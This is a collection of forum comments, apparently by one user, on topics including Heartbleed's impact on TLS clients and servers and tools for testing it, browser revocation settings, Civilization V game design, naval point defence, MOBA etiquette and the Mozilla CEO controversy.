Oh, please. OS X / Darwin's implementation of the Unix standard is screwier than half the Linux distros I've used. It's the same from Mac to Mac, sure, but that doesn't mean much; the same applies from SLES machine to SLES machine or from Nokia N900 to Nokia N900. Their filesystem layout is weird, they don't use standard files for some things, or do so bizarrely (some years back, I found their fstab manpage to be wrong and the file itself to be basically useless). Their user system is not entirely conventional.

There is no such singular thing as "the real Unix command line" but I could get a (descendent of) Bourne shell on versions of NT earlier than OS X existed.

The cool feature of Pacemaker is that it checks TLS *clients*, actually. There are other tools for server checks (one of which is included with Pacemaker) but it's actually very important to make sure any clients you have are invulnerable to Heartbleed as well. Software that ships with bundled or integrated OpenSSL libraries - and I've seen quite a few - could be vulnerable to this.

If the server (or client, for that matter) was hit with Heartbleed *during* (or shortly after) the session, the symmetric encryption key may have been retrieved and an attacker who had recorded the whole session could then decrypt it. If the session was ongoing and they were in position to do so, they could MitM it.

Similarly, if the attacker used Heartbleed during the key exchange, they might have leaked the private information (from either endpoint) needed to derive the symmetric key, even if for some reason they didn't get they key directly. Same impact as above.

If the attacker had used Heartbleed to steal the authentication private key prior to your session, they could have hit you with a MitM attack (appearing to be the authentic server) and you wouldn't have known.

If the attacker recorded your session but did not MitM it *or* use Heartbleed on the server while the symmetric key was in memory, you're safe (even if they stole the private key beforehand, much less afterward). That's the beauty of PFS.

So does IE10.

Internet Options -> Advanced -> Security (scroll near bottom) -> "Check for publisher's certificate revocation" and "Check for server's certificate revocation" are both checked for me. I know at least one of those options dates back to IE6, in fact, although it may have been inactive by default back then. I don't know when those options were made default, but at a guess I'd say IE8 or IE9.

As a side note, if you are running Vista or later but *not* on IE11, you have TLS 1.1 and 1.2 disabled by default. They're easy to turn on (same place as above, just scroll a bit lower).

Your requests are, unfortunately, somewhat contradictory. You ask for a smarter AI (that doesn't put ranged units in front, for example) and then ask for one that processes faster. You complain about the late-game AI time (where the decision trees are *huge*), then say you want the AI to give a harder game without handicaps.

Don't get me wrong, I want to see optimizations too. But, I think they did a pretty decent job of balance, especially in the expansions (the original game was kind of bad in many ways, AI included). Diplomacy has gotten a *lot* better, partially because the AI's motivations are more transparent.The AI unit management is non-ideal, but it's rarely outright bad anymore (and can in fact be really good at specific goals, like "capture that barbarian camp"). As for handicaps, the AI *does* play dumber/friendlier at the lower difficulties, and always has; the point at which the AI starts needing to cheat, and the degree of its cheating, has crept up over time though.

Those are good critiques of Civ5. There are a more, of course, but *most* of them boil down to the original release of the game being, basically, too big a change for them to get it right.

Let me say that again: Civ 5 was *badly* flawed at release, because it was too big a change.

For example, in a game where each unit (and tile, since they go together) is so much more precious than they were before, the 10HP system (where even a curbstomp battle costs 10% of your health, and the enemy rolling just a *little* too well can easily kill a unit that should have been wounded but near-guaranteed to survive) is stupid. They fixed that in the first expansion, and it made combat *much* better.

Then there's the silliness where ranged units turn into melee units as they upgrade. That is, sadly, still present in a few units (chariot archers, etc.) but it's way less common than it once was, and there are actual ranged units in the late-game now.

The original culture system was undeniably silly. The new one is better in many ways, although the lines between things that give faith and things that give culture and things that give tourism still feels a bit arbitrary. I mean, shouldn't world wonders *inherently* give tourism? Shouldn't religious buildings have a cultural impact as well? It's weird.

On the other hand, there are good things that I think you missed, too. You complain about three ways to trade in C5:BNW, but I see more than that (unit transfers are not explicitly trades, but they achieve much the same thing, and AI goodwill is effectively a commodity you can sometimes trade) and Alpha Centauri had the same things (Econ tech + treaties, direct trade over comlink, vote-buying in council). The tech tree has plenty of absurdities, but what else is new? That's hardly something Civ5-specific, and the power level progressions throughout the game are pretty good.

If they prematurely (i.e. before they said they were going to) EOL their products, yet continue to have any meaningful funds, a lawsuit would almost certainly follow. Not a great way to make money.

There have been a number of sites.
SSLLabs scanner has been updated to check for Heartbleed, and also will report when the cert validity starts (handy if you want to see whether they're using a new cert). https://www.ssllabs.com/ssltes...
LastPass has a pretty decent scanner that just focuses on Heartbleed (without all the other info that you get from SSLLabs): https://lastpass.com/heartblee...
There are some others out there as well, of course.

There's even one for client-side testing (almost as critical):
Pacemaker is an awesome little POC script (python 2.x) for testing whether a *client* is vulnerable (many that use OpenSSL are...). https://github.com/Lekensteyn/...

0.9.8 doesn't support any protocol newer than TLS 1.0, so while it's safe from heartbleed it's also old and verging on deprecated.

Also, it's not that rare for software to use its own copy of OpenSSL, either is a bundled library or statically compiled into the program. I don't actually know of any Mac software that I'm sure does this, but that's not saying much since I don't use a Mac. Things I would expect to find it in are cross-platform programs that use OpenSSL but want a newer branch than 0.9.8 (Python maybe?)

Well, Microsoft's CAPI (CryptoAPI) actually, not IIS. IIS uses CAPI, but IIS is no more a crypto toolkit than Apache or lighttpd are. A vuln in CAPI (they've happened before) could also affect clients (IE, Outlook, anything else using the platform APIs...).

Besides, we're still waiting on a NSS issue. NSS isn't so much *broadly* used - I know of only a few product families that use it - as it is *heavily* used. The product families in question are Mozilla anything (Firefox, mostly; the N stands for "Netscape") and Chrome (for PCs). Very few browsers (though not zero; Chrome on Android 4.1 uses a vulnerable version of OpenSSL) are/were vulnerable to Heartbleed, but they'll get their turn eventually!

Clearly, the solution is railgun-based point defense! Sure, it'll have a lower rate of fire than the current CIWS units, but imagine the light show you'd get from the sparks when of a pair of opposing slugs run into each other at a combined mach 12 or so?

Impractical today, of course, but technology marches on. In the meantime, it isn't actually that hard to deflect the projectile enough... if you can hit it at any meaningful distance. That's going to be quite impractical (just hitting it at all is likely impractical) so for the moment, yeah. Add to that the ability to scale up the gun faster than people can realistically produce defense (my WAG there, but I suspect it's true nonetheless) and offense is taking a lead right now.

On the other hand, that's been true for a long time in a different way, which also brings me to the best defensive measure I can think of: a few hundred feet of H2O. Phalanx can't hit a torpedo, either...

Meanwhile, in some MOBAs (I don't like LoL, but I've played a bit and used to play DotA, still play HoN, and occasionally play DotA2 or Smite), "GG" has become a term of mockery. Not universally, of course, but I've seen it after one team gets massively more powerful than the other and rather than pushing to end the game, they ignore structures entirely and focus on just killing the opponents over and over again (thus drawing out the game), especially if some people on the other team refuse to forfeit (it happens). There's nothing remotely good about that game - it's trolling, pure and simple - but that won't stop the trolls from saying so.

Except, of course, that nobody has asserted that he couldn't be CEO. Many people said that he shouldn't, but nobody said he couldn't. Big difference.

Oh, and if you don't see how giving him direct control of HR and of Mozilla's finances (which could then be used to make contributions in the company's name) is a risk, you're an idiot. Mozilla is a pro-gay-rights organization, by company policy and internal culture. Eich's actions undermined Mozilla in *exactly* the same way (though not to the same degree) as if he were advocating death or criminalization.

Oh, and to a certain extent, Prop 8 was an attempt to criminalize gays. Married couples receive a large number of legal benefits (taxes being an obvious one). A gay couple who tried to claim those benefits would be criminals. That's the weakest part of my response to you (because they could simply not *try* to claim them, merely being deprived rather than criminalized), and I almost left it off, but it's worth considering. Similarly, under DOMA, a married gay couple who filed federal taxes as "married, filing jointly" would be considered to have committed tax fraud.

Oh, just an addendum: This works against clients, too. So if an attacker can get between your smartphone and the Internet - really easy if using a public WiFi access point, such as at a café - they can dump all the secrets that your client knows when it tries to connect to its server. This could be stored images, messages, passwords, cached details of any kind, and so on. This can happen even if the server is *not* vulnerable, so long as the client is.

Seriously, scary bug.

You don't have to run it as root. You only have to run it such that nobody *except* root can start, spoof, or debug it. It needs to be something that "clients can trust it because compromising it would mean the OS is already compromised", not something that "the entire operating system trusts it, so that if it gets compromised it can compromise everything else". I realize what I said was unclear.

Besides, how is the attacker going to compromise it anyhow? It's not exposed to any remote services. Yes, it could be a local EoP vector if you ran it as root (so don't do that) but the only way *to* attack it is to already have arbitrary code execution on the machine.

Oh, and your "scatter parts of the password" idea is truly, incredibly, awful. Not only does that provide no real security (just obfuscation at best; it's still vulnerable to an attack like this with a bit more effort), it adds a lot of wasted effort. We're trying to build actual security here, not DRM...